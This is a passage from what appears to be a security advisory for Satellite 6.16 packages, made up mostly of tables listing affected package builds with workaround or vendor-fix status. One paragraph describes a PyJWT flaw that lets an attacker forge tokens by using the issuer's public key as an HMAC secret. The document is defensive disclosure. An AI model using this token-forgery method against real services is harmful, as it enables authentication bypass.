| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer's public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — | ||
